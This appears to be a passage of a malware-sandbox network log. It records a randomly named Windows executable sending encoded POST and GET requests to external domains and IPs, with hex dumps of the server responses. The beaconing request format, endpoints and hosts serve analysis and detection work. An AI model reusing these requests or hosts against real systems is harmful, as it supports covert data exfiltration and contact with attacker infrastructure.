                                                    Jul 3, 2024 17:52:32.832178116 CEST448INData Raw: c2 40 3f 12 a2 09 bf 05 37 80 a0 f7 3c 8a 56 5f 68 bc 8f 66 c9 f8 bd 3f 8b 47 69 98 5e 0b c6 d9 7b f1 85 f2 5e b8 cd 36 db 6a 6b 60 5a 1a c0 fa aa 51 68 4b ba 67 e3 0d 05 72 eb 6d 63 46 bd 79 34 89 c3 d3 2f b0 66 c4 01 91 d3 45 0a 96 97 c6 70 84
                                                    Data Ascii: @?7<V_hf?Gi^{^6jk`ZQhKgrmcFy4/fEp~)Fb>g)/Im"FM{yzJ!O<OQr|14?~>&58@i55?7>?nba^~J9*7dCOdK`PNhvQf8
                                                    Jul 3, 2024 17:52:32.832429886 CEST1236INData Raw: 92 e3 1d 65 30 2d 34 33 ce 26 97 70 fd fb a0 37 ea 7a 3a 38 9a 84 03 77 b9 8b f8 22 9e 90 74 42 b9 f1 b4 1d b5 23 77 b9 d9 1a fa 78 b2 ce 7c a9 80 79 5c 9c 09 0c fd e3 66 73 af 3a 21 99 7f 04 ce 78 54 5d 85 16 32 70 00 ff 83 4f 58 41 f1 c1 68 32
                                                    Data Ascii: e0-43&p7z:8w"tB#wx|y\fs:!xT]2pOXAh2=0p4l(cwai.w9uQ^+*4DpRk:ItVOFA:^~G4&%omQtGVOv^$#&
                                                    Jul 3, 2024 17:52:32.832442999 CEST1236INData Raw: d0 6d 39 41 b9 4d cb 3b 2a bd 6e e9 44 a3 52 bb 24 1c 23 11 fe 70 97 4e 76 73 8d bb b4 be 1f 2f b9 4b 0f 42 3f e0 48 0e ec 38 b9 c4 9d e6 dd d9 e2 ee 9e 85 ef dc 65 98 a5 8e f7 e6 46 77 ea f3 16 3c ea 2e fd 95 19 9e 03 af 45 26 74 a7 a9 2c 36 e5
                                                    Data Ascii: m9AM;*nDR$#pNvs/KB?H8eFw<.E&t,6Y;w>q|1t@^fSoxG?Y~=x-Z[[Rb)9^*x;[su^nnMyM% 6Z-}]L]{~./PN\-BK:>{.
                                                    Jul 3, 2024 17:52:32.832453966 CEST1236INData Raw: cf 35 f9 85 67 c8 3b 83 40 2f 3a 29 b9 05 b3 c5 ce f7 a2 b0 7b e9 64 27 e1 55 f4 b2 45 a9 ba d1 dc 22 38 8e cf 50 9e 8c 22 9c 6c 8e 0a cd 22 81 c2 09 c5 05 66 c9 2c 9e 54 53 8e 5b 6b c4 fa 16 d9 25 5c 48 e9 71 5a c7 67 fe 24 fa 04 9d fe c8 e9 23
                                                    Data Ascii: 5g;@/:){d'UE"8P"l"f,TS[k%\HqZg$#-i:x|ZIjm;,BeqqwUp;5wy:LW6GbS5TC~-XlB6S1z|l=~( fCX{(
                                                    Jul 3, 2024 17:52:32.832465887 CEST1236INData Raw: 4c 93 21 b6 15 ea 01 a3 45 15 87 15 c5 97 59 0c 0d 01 e8 c8 07 09 d6 9b 86 c8 e5 7a 7d f2 fd 1a f7 ab e0 8e 06 84 77 f8 f0 79 c7 d3 8f 76 0f 59 08 64 2f 93 25 f6 bc 4d 7b 32 b1 56 58 be 72 e6 3d 44 02 3d fc 7d 2c 8e 1c ca e7 b6 67 53 e2 6c 73 34
                                                    Data Ascii: L!EYz}wyvYd/%M{2VXr=D=},gSls4$s&xC\(vY^c36VG1v|pE4]]Zx3M)WK<uqd>*JT`T+>L`KlG{Czs
                                                    Jul 3, 2024 17:52:32.832649946 CEST896INData Raw: 76 ab d1 6a 35 b0 a4 90 8e 82 8f 18 25 fe b3 74 4c 57 4d e1 d6 42 d8 11 b0 fb e9 d6 18 5a 22 b8 99 75 92 f8 e1 af eb 99 df 69 5f 75 da c1 72 71 56 f3 28 21 7a 76 5a e3 27 32 51 39 69 fc 21 b0 e1 e2 93 2b fc 2f 40 a7 9e 95 e1 23 5a 8d 90 5f 6d 3d
                                                    Data Ascii: vj5%tLWMBZ"ui_urqV(!zvZ'2Q9i!+/@#Z_m=>`M3k)ops\kBwy|MnY"2@,bf`!~-y=)ca0rgPjY"%4tA*~qvW_yoWdTW
                                                    Jul 3, 2024 17:52:32.832665920 CEST1236INData Raw: 33 fd ce f0 3c fb 25 e1 a9 a2 4d f5 ca d5 a4 7a e5 6c d1 8c d0 09 68 fe d6 d5 6e fe 56 9a 56 eb 40 23 49 e6 ae 8c 24 7b 1a 31 65 8a af 12 ff 80 18 22 a6 72 83 a9 74 61 55 45 5c 15 67 b7 58 90 f1 b1 47 39 3d 3e 67 51 1c fb 3a c3 66 9c 3d 3b 32 75
                                                    Data Ascii: 3<%MzlhnVV@#I${1e"rtaUE\gXG9=>gQ:f=;2utqx)#tUC83GS(cEEng2+(5|2d+0}.r,tft:rt9p:Y1TFz6 YYP_#19%'Rf|Pn
                                                    Jul 3, 2024 17:52:32.832679033 CEST1236INData Raw: bd 63 a7 ea 1a e7 37 54 dd 0d 62 84 37 d9 de 5d a9 b0 86 b6 81 03 47 ec 45 a0 41 45 44 cf 36 f0 76 95 dd 00 b7 d4 f6 06 f8 20 48 f8 65 31 88 09 74 c5 48 5c d2 37 01 56 bb 0d 6f 02 74 55 9d 5d c0 eb 7a 86 52 59 98 9f 78 b5 9a f8 9c 8d 28 19 51 86
                                                    Data Ascii: c7Tb7]GEAED6v He1tH\7VotU]zRYx(Q1yfB(.T#;hTl]UeQlvi~00x+oOu3CQ!eBI.x<g5A7z_Vvl/dKS<,4R>X ~V:T!B O,G(
                                                    Jul 3, 2024 17:52:32.833139896 CEST1236INData Raw: 57 9c 8a d3 ce bb 40 42 0f d6 b4 6d 56 d3 94 bd bd 90 6d 05 e8 41 5b 31 74 ae ca b8 97 a6 0a b6 41 b3 ff 4d 1f b1 ab 04 ef a6 1d 5a 01 b1 dd de 36 a0 0b e5 6e 07 37 ee ad 8a 71 9b a6 89 c1 d0 23 1e 23 42 74 1c b1 4c a9 18 b1 a9 b9 03 c2 bc dc 0e
                                                    Data Ascii: W@BmVmA[1tAMZ6n7q##BtL{p<,q. /zAMS[]yi=j`a )uMRSn:nC!xrJE.dGlel7s6jmTp
                                                    Jul 3, 2024 17:52:32.837706089 CEST1236INHTTP/1.1 404 Not Found
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Wed, 03 Jul 2024 15:52:31 GMT
                                                    Server: Apache
                                                    X-Powered-By: PHP/8.2.20
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
                                                    Content-Encoding: gzip
                                                    Data Raw: 35 34 30 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed bd 5b 97 db 46 b2 2e f8 2c ff 0a 98 5a 2d 57 6d 13 e0 9d ac 2a a9 d4 23 cb 72 6f cf b1 2c 1f 4b ee 9e 3d 96 17 17 48 82 55 90 48 82 0d 90 75 b1 5a 3f e6 3c 9e 87 f3 b0 d7 79 9b c7 f1 1f 9b 2f 22 32 13 09 30 41 b2 2e b2 bd d7 1a 5d aa 48 20 2f 91 91 91 71 cb c8 c8 27 9f 4f 92 f1 ea 7a 19 79 e7 ab f9 ec e9 67 4f e8 97 37 0b 17 67 a7 b5 68 e1 ff f4 ba 46 cf a2 70 f2 f4 b3 07 4f e6 d1 2a f4 c6 e7 61 9a 45 ab d3 da 4f 6f be f1 8f f0 fa 81 7a b1 08 e7 d1 69 ed 22 8e 2e 97 49 ba aa 79 e3 64 b1 8a 16 28 78 19 4f 56 e7 a7 93 e8 22 1e 47 3e 7f a9 7b f1 22 5e c5 e1 cc cf c6 e1 2c 3a 6d 51 33 4f 66 f1 e2 bd 97 46 b3 d3 da 32 4d a6 f1 2c aa 79 e7 69 34 3d ad 9d af 56 cb 93 46 e3 6c be 3c 0b 92 f4 ac 71 35 5d 34 5a 52 67 15 af 66 d1 d3 1f c2 b3 c8 5b 24 2b 6f 9a ac 17 13 ef d1 c3 a3 76 ab f5 d8 7b 96 8e cf e3 55 34 5e 61 1c 4f 1a 52 f4 33 19 05 03 fb 45 9a 8c 92 55 f6 85 01 f5 8b 45 12 2f 26 d1 55 1d 8d 4d 93 d9 2c b9 fc c2 6b 00 01 06 b2 2f 26 8b cc 5f 02 a8 68 [TRUNCATED]
                                                    Data Ascii: 5402[F.,Z-Wm*#ro,K=HUHuZ?<y/"20A.]H /q'OzygO7ghFpO*aEOozi".Iyd(xOV"G>{"^,:mQ3OfF2M,yi4=VFl<q5]4ZRgf[$+ov{U4^aOR3EUE/&UM,k/&_h5>BX(.yd_:YQVQW@Mi-\.g8\fW^NkPGiu&&%%,'nLQQ+x bxRXXEW"yO><g2^.y.~V,NQE?UvDVotm4zonoQdgk5~!5qT;Pl3^=oK?^gW";](=W1<<Zq~UE(EBbLdw.KY=z{*wzILMV|yr.apYeh*I1AR?_>V)/^?%sG}hXHj#A{v(>;_=F={=Xx1n


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    23192.168.2.649752217.160.0.84805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:52:33.411583900 CEST1668OUTPOST /s24g/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.architect-usschool.com
                                                    Origin: http://www.architect-usschool.com
                                                    Referer: http://www.architect-usschool.com/s24g/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 31 70 67 46 4d 32 42 67 32 6f 53 6a 4b 44 49 52 48 36 30 72 33 73 6e 39 49 77 69 64 42 53 32 64 6a 76 5a 44 79 6c 67 55 65 4e 39 50 5a 67 54 5a 35 65 76 35 55 68 36 51 71 77 52 31 32 62 44 4d 79 38 42 70 4f 54 33 75 56 64 4a 5a 6b 46 51 62 72 2f 46 2f 65 53 45 50 4d 33 67 67 6c 37 58 56 2f 45 36 4e 6a 50 63 4b 32 7a 45 73 53 58 33 35 6b 4c 59 4f 4d 39 54 6d 34 39 45 59 51 41 77 71 45 4b 64 58 53 6d 71 6c 5a 79 48 33 54 30 66 7a 50 43 34 56 62 65 48 73 6e 62 76 39 4d 65 75 75 58 30 41 52 65 42 52 42 4b 47 35 39 57 4d 5a 31 67 79 4f 52 37 2b 34 47 34 43 6c 66 43 43 38 68 7a 4a 4b 4e 70 38 56 32 4e 75 41 6d 37 34 68 59 56 4f 55 62 37 67 47 43 69 75 64 66 76 30 65 71 6c 4c 68 6a 2b 79 42 4e 65 49 37 44 45 31 67 37 50 67 55 32 55 45 42 61 66 6f 38 4b 58 4f 4e 77 5a 35 79 74 7a 74 33 43 6f 43 41 57 6f 36 4c 30 2f 50 50 42 42 42 39 71 54 4b 47 30 6a 69 77 64 57 6e 2b 35 44 39 61 6a 51 31 53 7a 72 6e 46 76 42 6a 79 68 56 2b 56 31 5a 2f 45 4e 46 4c 33 62 6f 33 44 30 66 50 39 35 6e 2f [TRUNCATED]
                                                    Data Ascii: 7Dihs8p=1pgFM2Bg2oSjKDIRH60r3sn9IwidBS2djvZDylgUeN9PZgTZ5ev5Uh6QqwR12bDMy8BpOT3uVdJZkFQbr/F/eSEPM3ggl7XV/E6NjPcK2zEsSX35kLYOM9Tm49EYQAwqEKdXSmqlZyH3T0fzPC4VbeHsnbv9MeuuX0AReBRBKG59WMZ1gyOR7+4G4ClfCC8hzJKNp8V2NuAm74hYVOUb7gGCiudfv0eqlLhj+yBNeI7DE1g7PgU2UEBafo8KXONwZ5ytzt3CoCAWo6L0/PPBBB9qTKG0jiwdWn+5D9ajQ1SzrnFvBjyhV+V1Z/ENFL3bo3D0fP95n/H+RwsKXFFdl1WRPxv+5J/RsNv4GSSkl2Y7nfYVGqWLqjxOGpZfwuTqJcGR11jxm86WjWsSDZPwH6cV0nLGpY6fywPW7Dc4rUaARJTIhKdakYK6JNXC7ud+i4TF9Mgx0C51ZSsj1+1F3104mmZKqiOL4koEImQ9QzI4VSZ3mQLAjdSWekechaEthUdSosBvi4iG8QKZ0QG6IkYDegs2Nj9Uxh83+PgUP9DtO2sVZ07B+grO4lIyMrMM2STAb04srcs9rlY3vegBIsQkSqQGP8vDpePd+tzYf07VtnCyzdfsHSpTTsoDb83Of5S2J6z/2iTi2qEDMyHyk6N8lof4W6QYZIq8wEyeKu/0uxFBoRDaYoXLbmRS8cE/zR0F6UghXW/dLzzPH0xnGdqtnew9I5Gw/jZ3OP2idxfNul5D3lNsNaxoiUyvZ6lCrMhqEbWE+KOTJAjMQZ8mIe2ch2GWPKTG/AG3eiXBVv4phk9Oo/06AoN7FHT+kHL7boOSH0jf51VnjQ5bcwxpJRljDvSrAcPMZ4WN4CR7pzhos7Fwc+QmwR2+E+kf2yUJJkpFsi1Mr2BOR1YFXWR3p7WfnaqwIurL9NihjCpg/bMFHxeKRA2JTugXK8l9KbidC5TaW/cJlh5cBg4GIo9tSvEEA5ZgbaI9Qf+kQNZoSOSe [TRUNCATED]
                                                    Jul 3, 2024 17:52:34.506721020 CEST1236INHTTP/1.1 404 Not Found
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Wed, 03 Jul 2024 15:52:33 GMT
                                                    Server: Apache
                                                    X-Powered-By: PHP/8.2.20
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
                                                    Content-Encoding: gzip
                                                    Data Raw: 35 34 30 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed bd 5b 97 db 46 b2 2e f8 2c ff 0a 98 5a 2d 57 6d 13 e0 9d ac 2a a9 d4 23 cb 72 6f cf b1 2c 1f 4b ee 9e 3d 96 17 17 48 82 55 90 48 82 0d 90 75 b1 5a 3f e6 3c 9e 87 f3 b0 d7 79 9b c7 f1 1f 9b 2f 22 32 13 09 30 41 b2 2e b2 bd d7 1a 5d aa 48 20 2f 91 91 91 71 cb c8 c8 27 9f 4f 92 f1 ea 7a 19 79 e7 ab f9 ec e9 67 4f e8 97 37 0b 17 67 a7 b5 68 e1 ff f4 ba 46 cf a2 70 f2 f4 b3 07 4f e6 d1 2a f4 c6 e7 61 9a 45 ab d3 da 4f 6f be f1 8f f0 fa 81 7a b1 08 e7 d1 69 ed 22 8e 2e 97 49 ba aa 79 e3 64 b1 8a 16 28 78 19 4f 56 e7 a7 93 e8 22 1e 47 3e 7f a9 7b f1 22 5e c5 e1 cc cf c6 e1 2c 3a 6d 51 33 4f 66 f1 e2 bd 97 46 b3 d3 da 32 4d a6 f1 2c aa 79 e7 69 34 3d ad 9d af 56 cb 93 46 e3 6c be 3c 0b 92 f4 ac 71 35 5d 34 5a 52 67 15 af 66 d1 d3 1f c2 b3 c8 5b 24 2b 6f 9a ac 17 13 ef d1 c3 a3 76 ab f5 d8 7b 96 8e cf e3 55 34 5e 61 1c 4f 1a 52 f4 33 19 05 03 fb 45 9a 8c 92 55 f6 85 01 f5 8b 45 12 2f 26 d1 55 1d 8d 4d 93 d9 2c b9 fc c2 6b 00 01 06 b2 2f 26 8b cc 5f 02 a8 68 [TRUNCATED]
                                                    Data Ascii: 5402[F.,Z-Wm*#ro,K=HUHuZ?<y/"20A.]H /q'OzygO7ghFpO*aEOozi".Iyd(xOV"G>{"^,:mQ3OfF2M,yi4=VFl<q5]4ZRgf[$+ov{U4^aOR3EUE/&UM,k/&_h5>BX(.yd_:YQVQW@Mi-\.g8\fW^NkPGiu&&%%,'nLQQ+x bxRXXEW"yO><g2^.y.~V,NQE?UvDVotm4zonoQdgk5~!5qT;Pl3^=oK?^gW";](=W1<<Zq~UE(EBbLdw.KY=z{*wzILMV|yr.apYeh*I1AR?_>V)/^?%sG}hXHj#A{v(>;_=F={=Xx1n
                                                    Jul 3, 2024 17:52:34.506750107 CEST1236INData Raw: 75 4a 50 fe 14 2f 56 9d f6 b3 34 0d af 0f a2 e0 0c 30 11 79 00 f6 70 9f a6 83 09 0a 1e d6 d3 53 d4 bd 35 4c 0b 86 a9 7e 5f d0 1c 3e 4e a3 d5 3a 5d 78 ab 20 02 11 5c 1f 68 04 12 fa 0e 3f a8 97 d1 e9 e9 69 fa f3 ea 97 8f 87 39 82 d7 1a c1 d9 65 4c
                                                    Data Ascii: uJP/V40ypS5L~_>N:]x \h?i9eLG1(6gUqBQgiz5ofsp O@Fbuy44u'B_hD@=*51vQbmg}VU[tTzJOi>|S5R9S!gO-W
                                                    Jul 3, 2024 17:52:34.506762028 CEST1236INData Raw: c2 40 3f 12 a2 09 bf 05 37 80 a0 f7 3c 8a 56 5f 68 bc 8f 66 c9 f8 bd 3f 8b 47 69 98 5e 0b c6 d9 7b f1 85 f2 5e b8 cd 36 db 6a 6b 60 5a 1a c0 fa aa 51 68 4b ba 67 e3 0d 05 72 eb 6d 63 46 bd 79 34 89 c3 d3 2f b0 66 c4 01 91 d3 45 0a 96 97 c6 70 84
                                                    Data Ascii: @?7<V_hf?Gi^{^6jk`ZQhKgrmcFy4/fEp~)Fb>g)/Im"FM{yzJ!O<OQr|14?~>&58@i55?7>?nba^~J9*7dCOdK`PNhvQf8
                                                    Jul 3, 2024 17:52:34.506783009 CEST672INData Raw: 8f d2 e8 20 88 33 10 17 45 54 f8 d3 59 74 75 f8 e1 2c 44 55 38 10 30 7b 8e 32 67 69 3c 29 96 21 0d d9 2b b4 92 5c 7a 4f bd 80 dd 4a b3 68 ba fa 30 9d 25 21 8c 38 fa fc 58 d9 75 ca c5 86 2d ab 94 cd bb e2 63 6c ce 80 84 08 80 ad 8d b3 71 a8 5b e7
                                                    Data Ascii: 3ETYtu,DU80{2gi<)!+\zOJh0%!8Xu-clq[/%GEU?m~^*32K)d(rqrHF C;~0v!&JN<xg+kx=Nh/ [X!`\~++2M?am!e5Aa6
                                                    Jul 3, 2024 17:52:34.506793022 CEST1236INData Raw: 2f 91 50 0e 4e ae 5c 9b 2d 42 4b 3a ec 0d d2 3e 7b 81 2e b8 6e b2 89 77 37 00 6f d2 d3 6e 48 1d 7b 7c f7 09 9e a3 79 07 4c 7b 6c fd dd 09 a8 3d da 77 40 e5 dc 11 bc 13 1c ce 16 1d 3d 6f ee e5 dd a9 db cd e6 2a fb d4 3b 7a f7 d0 9f 6e ca d1 97 91
                                                    Data Ascii: /PN\-BK:>{.nw7onH{|yL{l=w@=o*;zn^w-9zb&[vw&oGqsNrn>of+bs';yhP*:Z[4[jFE|]^X/k_fgblg[DufhUdS6J
                                                    Jul 3, 2024 17:52:34.506803989 CEST1236INData Raw: 9b 16 86 20 66 ac 43 9c 9e 58 8f e6 f1 ca 7b 28 bf b7 d4 b6 75 b1 78 b1 5c af 7e 96 43 e3 52 f1 8b 5f f6 ac 4a 88 b0 9a 32 16 50 55 f5 ad f3 61 69 91 50 4c b4 e9 55 d5 94 03 9d a4 99 29 e3 95 34 45 9f ac 39 9e 2b f3 8d 6d 23 65 de 54 e9 95 6c 66
                                                    Data Ascii: fCX{(ux\~CR_J2PUaiPLU)4E9+m#eTlfa>C8OGFYUI.|;-%`(I.^02=Y/r\,Vn#>"RxT?bXj4B9=ttvg[`fhlKIi"";sk>Y}
                                                    Jul 3, 2024 17:52:34.506817102 CEST1236INData Raw: 7b e5 9a a5 1c 8e 9f 00 e5 bc 43 e6 c5 ae b5 7a 73 8a 95 c6 10 ce b6 10 d2 22 23 6a 17 1d 9d 58 0e e0 6a 5a 32 ac 89 1b c7 05 58 c8 2b 09 b6 2a 9c 58 93 af ec d4 9e 7d f0 2f a3 d1 fb 18 91 e4 79 7a 51 a4 ad f6 a8 23 8a 7f 78 28 dd 3c 46 c4 db af
                                                    Data Ascii: {Czs"#jXjZ2X+*X}/yzQ#x(<FloDo>)53S_7UhB`r!&+YoM%7 DBHkCD8B&uA2b#BMFB4&*s8q\,N(~
                                                    Jul 3, 2024 17:52:34.506827116 CEST104INData Raw: 57 8f 1d d3 5f 79 ad 6f 9f 93 8b 57 a4 86 64 14 54 57 d9 79 3d 5c a2 f2 99 e3 38 83 ba 5e a3 89 2b 7c 82 66 8f af cf fc 4c 9f ea 47 b2 00 ba 2f 1c d1 ac 0a 38 17 14 fd 29 fe d2 c5 97 9f 2d 03 9c e5 3b c3 7a 03 fc 21 c7 d1 6b 0d 96 2f 7f e5 32 ba
                                                    Data Ascii: W_yoWdTWy=\8^+|fLG/8)-;z!k/2ifU]WQ
                                                    Jul 3, 2024 17:52:34.507508039 CEST1236INData Raw: 8b c3 64 40 63 e6 4d 12 30 12 85 57 7e e6 f3 93 62 83 fa 32 45 85 49 69 e8 ab 64 f5 db ff 5e 78 93 c8 fb 26 1c 47 23 04 7f 78 18 21 36 6b c6 60 74 ba c9 f8 02 f1 04 d4 95 3f 1d a1 cd 07 7c d3 1e 5f 21 60 2e 0f f8 ec 01 b3 34 be c5 4f 21 fe 81 1a
                                                    Data Ascii: d@cM0W~b2EIid^x&G#x!6k`t?|_!`.4O!UTB43Qr`uW*].!n#m%d9[{AGW^LhT'3J>X<zl8Oi0FN=B')q}o3:*EU`];:V
                                                    Jul 3, 2024 17:52:34.507520914 CEST1236INData Raw: 74 e6 ad 7e fb 5f ab 35 6c 62 10 77 a1 67 e9 61 45 41 fe 94 46 88 61 a2 8c 11 92 56 88 ba b6 0c 36 1c b1 21 b7 91 e1 02 a3 58 d8 35 1b 6b 32 a6 68 15 e3 d8 3b 3c cf a2 19 5a 4c 1b ef b7 2e ab e2 1a 97 c4 bb 6a 32 35 8d 1e b5 e9 af 06 c0 b2 a9 b0
                                                    Data Ascii: t~_5lbwgaEAFaV6!X5k2h;<ZL.j25"i<RecM~_59G~xIG'kxn+KNKx/V0;,,VgCF&v2q8car{#scjEeF@"Ti74CYhSz@neft6A
                                                    Jul 3, 2024 17:52:34.512383938 CEST1236INData Raw: 85 40 88 ef 5e 3c fb f1 fb af 9f bd fe 77 26 58 92 48 33 04 26 86 de 57 3a 06 04 fe 14 22 6f b5 ef 91 67 c8 b4 6f 96 52 65 24 ef ae fe 42 c9 3f 20 f5 6f 58 83 f3 ed da 4d f8 08 e5 1a 93 0f ea 2c aa 83 87 4f ae bd 20 9a f9 e3 59 46 3e 28 c9 0f 4a
                                                    Data Ascii: @^<w&XH3&W:"ogoRe$B? oXM,O YF>(J8"g%5StqhPcnB#[g#H]7eAP%n^]Hwq3b7W(/BUXuJvMvJTRK!^a5..3S^bm!Lacc[0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    24192.168.2.649753217.160.0.84805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:52:35.943990946 CEST354OUTGET /s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM= HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.architect-usschool.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:52:36.843728065 CEST504INHTTP/1.1 301 Moved Permanently
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Wed, 03 Jul 2024 15:52:36 GMT
                                                    Server: Apache
                                                    X-Powered-By: PHP/8.2.20
                                                    Expires: Wed, 03 Jul 2024 16:52:36 GMT
                                                    Cache-Control: max-age=3600
                                                    X-Redirect-By: WordPress
                                                    Location: http://architect-usschool.com/s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM=
                                                    Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    25192.168.2.64975491.195.240.19805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:52:41.944279909 CEST613OUTPOST /3jr0/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.easybackpage.net
                                                    Origin: http://www.easybackpage.net
                                                    Referer: http://www.easybackpage.net/3jr0/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 50 34 50 37 4f 42 70 4c 62 35 6d 6b 30 39 41 67 4f 71 4e 57 56 35 79 46 56 6b 47 33 77 69 77 36 64 43 2f 59 33 39 63 62 5a 35 52 76 41 55 6b 4a 32 52 69 76 6b 72 42 4f 6a 66 4e 50 70 4f 46 53 6c 69 31 33 66 38 72 4a 56 47 55 34 53 74 7a 78 5a 54 33 42 71 62 7a 53 45 34 36 61 68 32 6b 6d 73 4a 71 6e 32 48 75 41 6e 2b 41 4e 77 49 6a 4f 56 6d 67 55 61 53 78 2f 31 51 41 44 4c 63 71 71 66 38 45 5a 6a 48 50 45 5a 38 6c 49 78 62 47 4c 4a 5a 54 4c 37 64 5a 54 50 4e 44 62 35 46 64 4d 70 38 62 54 76 31 63 47 42 6a 52 4f 4c 56 6d 4a 77 46 37 65 62 38 76 76 57 53 76 51 34 6c 62 31 49 4a 37 69 43 52 52 62 35 49 6e 39
                                                    Data Ascii: 7Dihs8p=P4P7OBpLb5mk09AgOqNWV5yFVkG3wiw6dC/Y39cbZ5RvAUkJ2RivkrBOjfNPpOFSli13f8rJVGU4StzxZT3BqbzSE46ah2kmsJqn2HuAn+ANwIjOVmgUaSx/1QADLcqqf8EZjHPEZ8lIxbGLJZTL7dZTPNDb5FdMp8bTv1cGBjROLVmJwF7eb8vvWSvQ4lb1IJ7iCRRb5In9
                                                    Jul 3, 2024 17:52:42.604969025 CEST305INHTTP/1.1 405 Not Allowed
                                                    date: Wed, 03 Jul 2024 15:52:42 GMT
                                                    content-type: text/html
                                                    content-length: 154
                                                    server: Parking/1.0
                                                    connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    26192.168.2.64975591.195.240.19805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:52:44.486196995 CEST637OUTPOST /3jr0/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.easybackpage.net
                                                    Origin: http://www.easybackpage.net
                                                    Referer: http://www.easybackpage.net/3jr0/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
